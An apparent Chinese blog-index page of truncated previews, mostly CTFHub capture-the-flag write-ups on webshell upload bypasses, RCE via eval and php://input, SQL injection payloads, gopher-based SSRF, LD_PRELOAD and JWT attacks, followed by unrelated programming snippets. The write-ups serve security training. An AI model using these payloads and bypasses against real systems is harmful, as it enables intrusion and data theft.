    一.前置知识文件上传漏洞:文件上传功能是许多Web应用程序的常见功能之一,但在实施不当的情况下,可能会导致安全漏洞。文件上传漏洞的出现可能会使攻击者能够上传恶意文件,执行远程代码,绕过访问控制等。文件类型验证:Web应用程序通常会对上传的文件类型进行验证,以确保只允许特定类型的文件上传。这种验证可以通过检查文件扩展名或内容类型(MIME类型)来实现。然而,这种验证机制往往是不可靠的,因为攻击者可以
  • CTFHub技能树web之文件上传(二) wz_fisher 网络安全安全
    第四题:MIME绕过MIME类型校验就是我们在上传文件到服务端的时候,服务端会对客户端也就是我们上传的文件的Content-Type类型进行检测,如果是白名单所允许的,则可以正常上传,否则上传失败。首先对上传的一句话木马抓包将Content-Type这一栏改为image/jpeg上传成功,使用蚁剑连接,成功连接第五题:00截断%00是截断的意思,后面的内容舍弃上传一句话木马,抓包将filename
  • CTFHub技能树web之RCE(二) wz_fisher 网络安全
    第五题:远程包含根据题目,使用远程包含进行打开phpinfo,可以看到allow_url_fopen和allow_url_include都是On,因此可以使用php://input,由于代码会检查file中的内容,因此不能够使用php://filter包含文件,使用php://input通过hackbar使用POST方式发包,抓包并在最后一行加php代码执行成功得到flag第六题:命令注入首先熟悉
  • CTFHub技能树web之RCE(一) wz_fisher 网络安全
    RCE是php的代码执行简称,是RemoteCommandExec(远程命令执行)和RemoteCodeExec(远程代码执行)的缩写;Command指的是操作系统的命令,code指的是脚本语言(php)的代码。第一题:eval执行根据代码可以看到该网页使用request得到cmd参数并使用eval执行cmd的代码,其中isset函数用于检测是否传入了一个名为cmd的变量的值(是否非空),eval
  • ctfhub每日签到 yzzob 程序人生
    1.python实现importtimeimportosfromdatetimeimportdatetimeimportrequestsheaders={"Accept":"application/json,text/plain,*/*","Accept-Encoding":"gzip,deflate,br","Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8,e
  • CTFHUB-WEB-SQL注入-报错注入 老大的豆豆酱 CTFmysql安全
    报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。题目:靶机环境:输入1时,显示正确输入一个随意的字符串后,显示错误。求数据库名:输入1unionselectupdatexml(1,concat(0x7e,database(),0x7e),1);,页面报错:求表名:输入1unionselectupdatexml(1,concat(0x7e,(select(g
  • CTFHub-Web-密码口令 WriteUp 曾小健_0532
    一、弱口令  1.题目内容  2.解题思路  使用burpsuite进行字典爆破  3.解题过程  首先抓包  使用intruder模块进行爆破  得到正确的口令,CaptureTheFlag!二、默认口令  1.题目内容  2.解题思路  网上查找该产品的默认用户名和密码  3.解题过程  查询到默认用户名为eyougw,密码为admin@(eyou),成功登陆后,CaptureTheFlag!
  • 小迪渗透&CTF夺旗&SRC挖掘(拾叁) 进击的网安攻城狮 pythonflaskpycharm
    文章目录83.Python考点SSTI&反序列化&字符串(83-88)演示案例:涉及资源84.PHP弱类型&异或取反&序列化&RCEPHP常考点弱类型绕过对比总结反序列化考点:网鼎杯2020-青龙组-web-AreUserialzpreg_match绕过-ctfhub-2020-第五空间智能安全大赛-web-hate-php涉及资源85.JAVA反编译&XXE&反序列化Java常考点及出题思路Ja
  • CTFHUB SSRF POST小记 I_WORM 安全ctfhubssrfpost
    这关考察的是gopher伪协议构造post请求;gopher伪协议总结:SSRF笔记整理-CSDN博客有很多的细节需要注意格式:gopher://192.168.232.125:80/_+下面url编码后的内容默认访问70端口,访问web时需要改为80端口%0A时linux下的换行符,windows下需要改为%0D%0A(小写也行,window不区分大小写)gopher伪协议的数据的第一字符不识别
  • CTFHUB技能树-SSRF【持续更新】 M1r4n SSRFctfhubCTFphpwebpost
    CTFHUBSSRF0x00POST请求首先开始解题构造gopher数据构造获取flag数据0x01上传文件废话首先构造请求构造gopher数据构造获取flag数据0x00POST请求最近ctfhub新添加了一些题目,看到有ssrf的题目便去试了一下,前面几个都比较简单就暂时先不写,post请求那个折腾了几天终于弄懂了,把过程记录下。首先我们看下题目描述,这个肯定是不能错过的。*描述:发一个HTT
  • ctf web方向与php学习记录27 这周末在做梦 SSRFbypasslinuxc++c语言c#
    针对一道ctfhub上的LD_PRELOAD,我进行了为期三天的学习和总结,以下是总结和收集的资料,由于是在onenote上作的笔记,就不在花功夫对文字进行编辑了,大家自行阅览,希望能对你起到帮助。接下来我给出的wp。一,蚁剑连接二,创建hack.c并转共享hack.sohack.c代码#include#include#include__attribute__((__constructor__))
  • CTFHub:工业信息安全技能大赛 -WP 五行缺你94 ctfctf简单工厂模式
    WiFi题目描述在无线WIFI通信中,黑客截获了数据包,想破解里面的密码,请找出里面的flag。题目考点力控软件使用解题思路将may目录下的文件内容去掉[]之后组成字典,使用aircrack-ng直接跑包,找到的密码即为flagFlagflag{0TUMVxz0JrUSDxHG}Login题目描述黑客渗透进入某工业企业内网,发现了登录界面,截获了登录时的流量包,根据社会工程学知识,密码是一串有意义
  • CTFHUB web进阶学习 Je3Z webctflinuxphp
    CTFHub之web进阶学习PHP突破disable_functions常用姿势以及使用Fuzz挖掘含内部系统调用的函数Linux动态加载器ctfhub动态加载器linux–>ldd命令的介绍就是没有x执行程序的权限,然后我们要执行/readflag来拿到flag,这里就用到了linux动态库链接器/加载器ld-linux.so.2这里我们直接ldd/readflag列出所需要得动态链接库然后再/
  • CTFHub:web-LD_PRELOAD-WP 五行缺你94 ctfandroidctf
    解题思路思路分析根据资料可得知有四种绕过disable_functions的手法:攻击后端组件,寻找存在命令注入的web应用常用的后端组件,如,ImageMagick的魔图漏洞、bash的破壳漏洞等等寻找未禁用的漏网函数,常见的执行命令的函数有system()、exec()、shell_exec()、passthru(),偏僻的popen()、proc_open()、pcntl_exec(),逐一
  • CTFHUB JWT(Json Web Token) 葫芦娃42 CTFHub技能树json
    官方解释链接:JWT基础知识目录什么是JWT(基础知识)JWT的原理JWT的数据结构HeaderPayloadSignature敏感信息泄露none算法(无签名)弱密钥(c-jwt-cracker爆破密钥)修改签名算法什么是JWT(基础知识)JsonWebToken(JWT),是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准(RFC7519。该token被设计为紧凑且安全的,特别适
  • CTF之think_java反序列化完整案例 出顾茅庐 WEBCTFjava安全
    2020-网鼎杯-朱雀组-Web-think_java详解环境复现CTFHub附件代码审计通过打开附件文件中test类文件发现//发现文件路劲@RequestMapping({"/common/test"})publicclassTest{publicTest(){}@PostMapping({"/sqlDict"})//通过文件命名可以发现是关于sql的文件@Access@ApiOperatio
  • CTFhub-网站源码 郭子不想改bug CTF-web服务器运维
    CTFhub-Web-信息泄露-备份文件下载-网站源码题目信息解题过程无脑爆破(笑写个python脚本importrequests#这里的url是你的地址url="http://challenge-67a05a3755f2610d.sandbox.ctfhub.com:10800/"list1=['web','website','backup','back','www','wwwroot','te
  • CTFhub-bak文件 郭子不想改bug CTF-web安全
    CTFhub-Web-信息泄露-备份文件下载-bak文件题目信息解题过程看到提示说和index.php有关,在url后面加index.php.bak,跳转到http://challenge-7a4da2076cfabae6.sandbox.ctfhub.com:10800/index.php.bak网址,即:跳转到下载页面,下载内容为:这就是我们需要的flag!
  • CTFHub-技能树-SQL注入 Patrick_star__
    整数型注入不需考虑任何过滤,由于始终只返回第一行的信息,所以使用LIMIT来查看其他行的返回。常规注入流程:爆数据库名->爆表名->爆字段名->使用unionselect获得想要知道的对应字段的内容。爆数据库名1unionselectdatabase(),1limit1,2数据库为sqli爆表名通过更改limit的值得到sqli数据库中可能藏有flag的表名1unionselecttable_na
  • CTF初体验 捞虾米 网安入门安全
    靶场:www.ctfhub.com第一题一、题目信息1.题目名称:请求方式2.题目难度:3.题目描述:HTTP请求方法,HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源二、解题思路打开页面显示1.思考过程:在面对需要采用GET方法的情况下,我首先想到了使用BurpSuite进行抓包。然而,在初始阶段,我并未对网页的其他文字内容给予充分关注,这导致了一段时间的抓包过程中始
  • CTFHUB--SSRF详解 小蓝同学` 信息安全漏洞webkalilinux安全漏洞渗透测试
    SSRF详解SSRF漏洞介绍一、(内网访问、伪协议利用)1.1内网访问1.2伪协议读取文件1.3端口扫描二、(POST上传文件FastCGI协议Redis协议)2.1POST请求2.2上传文件2.3FastCGI协议2.4Redis协议三、(Bypass系列)3.1URLBypass3.2数字IPBypass3.3302跳转Bypass3.4DNS重绑定BypassSSRF漏洞介绍  SSRT(S
  • CTFhub-Web-Web前置技能-“302跳转“ 郭子不想改bug CTF-web前端
    题目信息HTTP临时重定向,题目截图如下所示:分析过程看到跳转路径为:http://challenge-d1a96d97eaecf029.sandbox.ctfhub.com:10800/index.html分析可能存在重定向问题,如果要想获得flag,则可能存在http://challenge-d1a96d97eaecf029.sandbox.ctfhub.com:10800/flag.txt解
  • CTFhub-Cookie 郭子不想改bug CTF-web服务器运维
    CTFhub-Web-Web前置技能-“Cookie”题目分析图片显示需要admin权限解题过程F12打开开发者工具,在consolo里输入document.cookie=‘admin=1’可获得:按F5刷新即可获得flag在consolo里再次输入document.cookie=‘admin=0’,可进行刷新或者通过Application-cookie修改admin的值为1也可
  • CTFhub-HTTP响应包源代码查看 郭子不想改bug CTF-web前端
    CTFhub-Web-Web前置技能-“HTTP响应包源代码查看”题目分析页面空白,想到flag也许在源代码中解题过程F12,在element中,看到html代码,在其body中找到flag
  • CTFhub-目录遍历 郭子不想改bug CTF-web前端安全
    CTFhub-Web-信息泄露-“目录遍历”题目解题过程这个题我不太懂…但是使用chrome似乎不行,需要换浏览器(edge或者firefox都可)…难道是chrome已经对目录暴力遍历进行了限制?
  • [GKCTF 2020]cve版签到 妙尽璇机 ctfweb安全网络安全
    [GKCTF2020]cve版签到wp信息搜集题目页面:页面中有提示:Youjustview*.ctfhub.com点一下ViewCTFHub会回弹一些信息:抓包看看:url传参,判断是ssrf。但是当我将其改为http://www.baidu.com或者是http://127.0.0.1时却没有任何响应:看了大佬的博客,知道了这是cve-2020-7066。cve-2020-7066根据阿里云漏
  • CTFHub-Web-信息泄露 WriteUp 曾小健_0532
    一、目录遍历  1.题目内容  点击绿色按钮,进入到一个Web根文件夹中,要求我们遍历所有文件夹,找到flag  2.解题思路  由于本题根目录下包含4个文件夹,每个文件夹下面又都包含了4个子文件夹,数量并不多,因此可以采用人工搜寻的方式。但是当遇到文件夹数量过多时,需要编写脚本来自动遍历寻找。  3.解题过程  编写了一个Python脚本,自动进行遍历importrequestsbase_url
  • SSRF - ctfhub - 1【内网访问、伪协议读取、端口扫描、POST详解、上传文件】 sayo. 网络安全
    写在前面ssrf无论是生活中还是比赛中都是一种非常常见的漏洞。但一般来说单独考察的较少。后面将从ctfhub和其他平台上来慢慢练习。SSRF(Server-SideRequestForgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统
  • SSRF - ctfhub -2【FastCGI协议、Redis协议、URL Bypass、数字IP Bypass、302跳转 Bypass、DNS重绑定Bypass】 sayo. 网络安全
    FastCGI协议知识参考:CTFhub官方链接首先介绍一下原理(这里简单介绍,详情请看官方附件)如果说HTTP来完成浏览器到中间件的请求,那么FastCGI就是从中间件到某语言后端进行交换的协议。和浏览器请求包一样,也是由header、body组成。还需要提到一个PHP-FPM,FastCGI进程管理器,即在php中(nginx等服务器中间件)FastCGI规则打包好后传递的终点,最后由FPM按
  • CTFHUB .DS_Store 是小航呀~ CTFHUBweb安全
    CTFHUB-web-信息泄露-备份文件下载-.DS_Store题目:.DS_Store是MacOS保存文件夹的自定义属性的隐藏文件。通过.DS_Store可以知道这个目录里面所有文件的清单。(题目就是知识!!!)打开环境有了前面做题的经验,我们尝试在url中输入/.DS_Store(访问隐藏文件时前面要加“.")得到一个文件,用文本打开文件在文本中我们得到了一个文件名(不怎么显眼,仔细看),我们
  • Algorithm 香水浓 javaAlgorithm
    冒泡排序 public static void sort(Integer[] param) { for (int i = param.length - 1; i > 0; i--) { for (int j = 0; j < i; j++) { int current = param[j]; int next = param[j + 1];
  • mongoDB 复杂查询表达式 开窍的石头 mongodb
    1:count    Pg: db.user.find().count();    统计多少条数据 2:不等于$ne    Pg: db.user.find({_id:{$ne:3}},{name:1,sex:1,_id:0});    查询id不等于3的数据。 3:大于$gt $gte(大于等于) &n
  • Jboss Java heap space异常解决方法, jboss OutOfMemoryError : PermGen space 0624chenhong jvmjboss
    转自 http://blog.csdn.net/zou274/article/details/5552630 解决办法: window->preferences->java->installed jres->edit jre 把default vm arguments 的参数设为-Xms64m -Xmx512m ----------------
  • 文件上传 下载 解析 相对路径 不懂事的小屁孩 文件上传
    有点坑吧,弄这么一个简单的东西弄了一天多,身边还有大神指导着,网上各种百度着。 下面总结一下遇到的问题: 文件上传,在页面上传的时候,不要想着去操作绝对路径,浏览器会对客户端的信息进行保护,避免用户信息收到攻击。 在上传图片,或者文件时,使用form表单来操作。 前台通过form表单传输一个流到后台,而不是ajax传递参数到后台,代码如下: <form action=&
  • 怎么实现qq空间批量点赞 换个号韩国红果果 qq
    纯粹为了好玩!! 逻辑很简单 1 打开浏览器console;输入以下代码。 先上添加赞的代码 var tools={}; //添加所有赞 function init(){ document.body.scrollTop=10000; setTimeout(function(){document.body.scrollTop=0;},2000);//加
  • 判断是否为中文 灵静志远 中文
    方法一: public class Zhidao { public static void main(String args[]) { String s = "sdf灭礌 kjl d{';\fdsjlk是"; int n=0; for(int i=0; i<s.length(); i++) { n = (int)s.charAt(i); if((
  • 一个电话面试后总结 a-john 面试
    今天,接了一个电话面试,对于还是初学者的我来说,紧张了半天。 面试的问题分了层次,对于一类问题,由简到难。自己觉得回答不好的地方作了一下总结:   在谈到集合类的时候,举几个常用的集合类,想都没想,直接说了list,map。   然后对list和map分别举几个类型:   list方面:ArrayList,LinkedList。在谈到他们的区别时,愣住了
  • MSSQL中Escape转义的使用 aijuans MSSQL
    IF OBJECT_ID('tempdb..#ABC') is not null drop table tempdb..#ABC create table #ABC ( PATHNAME NVARCHAR(50) ) insert into #ABC SELECT N'/ABCDEFGHI' UNION ALL SELECT N'/ABCDGAFGASASSDFA' UNION ALL
  • 一个简单的存储过程 asialee mysql存储过程构造数据批量插入
               今天要批量的生成一批测试数据,其中中间有部分数据是变化的,本来想写个程序来生成的,后来想到存储过程就可以搞定,所以随手写了一个,记录在此:            DELIMITER $$ DROP PROCEDURE IF EXISTS inse
  • annot convert from HomeFragment_1 to Fragment 百合不是茶 android导包错误
    创建了几个类继承Fragment, 需要将创建的类存储在ArrayList<Fragment>中; 出现不能将new 出来的对象放到队列中,原因很简单;     创建类时引入包是:import android.app.Fragment;      创建队列和对象时使用的包是:import android.support.v4.ap
  • Weblogic10两种修改端口的方法 bijian1013 weblogic端口号配置管理config.xml
    一.进入控制台进行修改    1.进入控制台:  http://127.0.0.1:7001/console     2.展开左边树菜单         域结构->环境->服务器-->点击AdminServer(管理) &
  • mysql 操作指令 征客丶 mysql
    一、连接mysql 进入 mysql 的安装目录; $ bin/mysql -p [host IP 如果是登录本地的mysql 可以不写 -p 直接 -u] -u [userName] -p 输入密码,回车,接连; 二、权限操作[如果你很了解mysql数据库后,你可以直接去修改系统表,然后用 mysql> flush privileges; 指令让权限生效] 1、赋权 mys
  • 【Hive一】Hive入门 bit1129 hive
    Hive安装与配置 Hive的运行需要依赖于Hadoop,因此需要首先安装Hadoop2.5.2,并且Hive的启动前需要首先启动Hadoop。   Hive安装和配置的步骤   1. 从如下地址下载Hive0.14.0   http://mirror.bit.edu.cn/apache/hive/    2.解压hive,在系统变
  • ajax 三种提交请求的方法 BlueSkator Ajaxjqery
    1、ajax 提交请求 $.ajax({ type:"post", url : "${ctx}/front/Hotel/getAllHotelByAjax.do", dataType : "json", success : function(result) { try { for(v
  • mongodb开发环境下的搭建入门 braveCS 运维
      linux下安装mongodb 1)官网下载mongodb-linux-x86_64-rhel62-3.0.4.gz 2)linux 解压  gzip -d mongodb-linux-x86_64-rhel62-3.0.4.gz; mv mongodb-linux-x86_64-rhel62-3.0.4 mongodb-linux-x86_64-rhel62-
  • 编程之美-最短摘要的生成 bylijinnan java数据结构算法编程之美
    import java.util.HashMap; import java.util.Map; import java.util.Map.Entry; public class ShortestAbstract { /** * 编程之美 最短摘要的生成 * 扫描过程始终保持一个[pBegin,pEnd]的range,初始化确保[pBegin,pEnd]的ran
  • json数据解析及typeof chengxuyuancsdn jstypeofjson解析
    // json格式 var people='{"authors": [{"firstName": "AAA","lastName": "BBB"},' +' {"firstName": "CCC&
  • 流程系统设计的层次和目标 comsci 设计模式数据结构sql框架脚本
                                  流程系统设计的层次和目标  
  • RMAN List和report 命令 daizj oraclelistreportrman
    LIST 命令 使用RMAN LIST 命令显示有关资料档案库中记录的备份集、代理副本和映像副本的 信息。使用此命令可列出: • RMAN 资料档案库中状态不是AVAILABLE 的备份和副本 • 可用的且可以用于还原操作的数据文件备份和副本 • 备份集和副本,其中包含指定数据文件列表或指定表空间的备份 • 包含指定名称或范围的所有归档日志备份的备份集和副本 • 由标记、完成时间、可
  • 二叉树:红黑树 dieslrae 二叉树
        红黑树是一种自平衡的二叉树,它的查找,插入,删除操作时间复杂度皆为O(logN),不会出现普通二叉搜索树在最差情况时时间复杂度会变为O(N)的问题.     红黑树必须遵循红黑规则,规则如下     1、每个节点不是红就是黑。     2、根总是黑的  &
  • C语言homework3,7个小题目的代码 dcj3sjt126com c
    1、打印100以内的所有奇数。 # include <stdio.h> int main(void) { int i; for (i=1; i<=100; i++) { if (i%2 != 0) printf("%d ", i); } return 0; }  2、从键盘上输入10个整数,
  • 自定义按钮, 图片在上, 文字在下, 居中显示 dcj3sjt126com 自定义
    #import <UIKit/UIKit.h> @interface MyButton : UIButton -(void)setFrame:(CGRect)frame ImageName:(NSString*)imageName Target:(id)target Action:(SEL)action Title:(NSString*)title Font:(CGFloa
  • MySQL查询语句练习题,测试足够用了 flyvszhb sqlmysql
    http://blog.sina.com.cn/s/blog_767d65530101861c.html 1.创建student和score表 CREATE  TABLE  student ( id  INT(10)  NOT NULL  UNIQUE  PRIMARY KEY  , name  VARCHAR
  • 转:MyBatis Generator 详解 happyqing mybatis
      MyBatis Generator 详解 http://blog.csdn.net/isea533/article/details/42102297   MyBatis Generator详解 http://git.oschina.net/free/Mybatis_Utils/blob/master/MybatisGeneator/MybatisGeneator.
  • 让程序员少走弯路的14个忠告 jingjing0907 工作计划学习
      无论是谁,在刚进入某个领域之时,有再大的雄心壮志也敌不过眼前的迷茫:不知道应该怎么做,不知道应该做什么。下面是一名软件开发人员所学到的经验,希望能对大家有所帮助   1.不要害怕在工作中学习。 只要有电脑,就可以通过电子阅读器阅读报纸和大多数书籍。如果你只是做好自己的本职工作以及分配的任务,那是学不到很多东西的。如果你盲目地要求更多的工作,也是不可能提升自己的。放
  • nginx和NetScaler区别 流浪鱼 nginx
    NetScaler是一个完整的包含操作系统和应用交付功能的产品,Nginx并不包含操作系统,在处理连接方面,需要依赖于操作系统,所以在并发连接数方面和防DoS攻击方面,Nginx不具备优势。 2.易用性方面差别也比较大。Nginx对管理员的水平要求比较高,参数比较多,不确定性给运营带来隐患。在NetScaler常见的配置如健康检查,HA等,在Nginx上的配置的实现相对复杂。 3.策略灵活度方
  • 第11章 动画效果(下) onestopweb 动画
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • FAQ - SAP BW BO roadmap blueoxygen BOBW
    http://www.sdn.sap.com/irj/boc/business-objects-for-sap-faq   Besides, I care that how to integrate tightly.   By the way, for BW consultants, please just focus on Query Designer which i
  • 关于java堆内存溢出的几种情况 tomcat_oracle javajvmjdkthread
    【情况一】:    java.lang.OutOfMemoryError: Java heap space:这种是java堆内存不够,一个原因是真不够,另一个原因是程序中有死循环;   如果是java堆内存不够的话,可以通过调整JVM下面的配置来解决:   <jvm-arg>-Xms3062m</jvm-arg>   <jvm-arg>-Xmx
  • Manifest.permission_group权限组 阿尔萨斯 Permission
    结构 继承关系 public static final class Manifest.permission_group extends Object java.lang.Object android. Manifest.permission_group 常量 ACCOUNTS 直接通过统计管理器访问管理的统计 COST_MONEY可以用来让用户花钱但不需要通过与他们直接牵涉的权限 D
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他